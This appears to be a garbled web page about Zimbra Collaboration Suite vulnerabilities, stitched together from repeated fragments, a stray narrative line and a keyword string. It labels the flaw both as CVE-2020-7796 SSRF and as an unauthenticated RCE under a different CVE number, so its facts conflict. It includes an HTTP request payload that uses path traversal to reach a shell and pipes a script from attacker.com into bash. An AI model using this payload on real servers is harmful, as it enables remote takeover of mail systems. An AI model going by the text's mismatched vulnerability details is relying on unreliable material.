The following versions of Zimbra Collaboration Suite are vulnerable:
The response lists every admin email hash. She extracts admin@logi-core.local . cve20207796 zimbra collaboration suite full
Unlike many vulnerabilities that yield limited access (e.g., file read only, or authenticated RCE), CVE-2020-27996 allows an unauthenticated remote attacker to execute arbitrary system commands with the privileges of the Zimbra service user (typically zimbra ). This is the equivalent of handing over the keys to the kingdom. The following versions of Zimbra Collaboration Suite are
GET /service/extension/UserServlet?ext=com.zimbra.cs.extension.ExtensionUtil&file=../../../../../../../bin/sh&-c$IFScurl$IFSattacker.com/shell.sh|bash HTTP/1.1 Host: victim.zimbra.com file read only
: Look for unusual outbound connections or suspicious requests in your Zimbra and proxy logs. Zimbra Collaboration Suite SSRF (CVE-2020-7796) - Acunetix
: Zimbra Collaboration Suite versions prior to 8.8.15 Patch 7